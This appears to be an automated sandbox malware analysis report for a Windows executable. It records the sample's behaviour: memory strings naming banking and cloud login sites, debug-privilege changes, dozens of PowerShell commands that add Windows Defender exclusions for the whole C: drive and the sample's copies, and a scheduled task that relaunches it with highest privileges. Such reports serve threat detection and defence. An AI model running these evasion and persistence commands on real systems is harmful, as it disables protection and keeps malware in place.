                            Source: 9XHFe6y4Dj.exe, 00000000.00000002.2502998988.000000001BBA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6
                            Source: qfrwB6ToHg.71.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: qfrwB6ToHg.71.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: qfrwB6ToHg.71.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: qfrwB6ToHg.71.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: qfrwB6ToHg.71.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: qfrwB6ToHg.71.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: w32tm.exe, 00000046.00000002.2304403259.0000014CECAC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: qfrwB6ToHg.71.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: qfrwB6ToHg.71.drBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: qfrwB6ToHg.71.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: qfrwB6ToHg.71.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: qfrwB6ToHg.71.drBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: qfrwB6ToHg.71.drBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: qfrwB6ToHg.71.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: qfrwB6ToHg.71.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: qfrwB6ToHg.71.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: 9XHFe6y4Dj.exe, 00000000.00000002.2502998988.000000001BB70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                            Source: qfrwB6ToHg.71.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: qfrwB6ToHg.71.drBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: qfrwB6ToHg.71.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: qfrwB6ToHg.71.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: 9XHFe6y4Dj.exe, tqeRXJHxPWPPoiNqjJeEYdv.exe.0.dr, tqeRXJHxPWPPoiNqjJeEYdv.exe0.0.dr, tqeRXJHxPWPPoiNqjJeEYdv.exe2.0.drBinary or memory string: fCp1CaYdjaLhGFsOu6UZ
                            Source: qfrwB6ToHg.71.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: qfrwB6ToHg.71.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: qfrwB6ToHg.71.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /fJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeQueries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
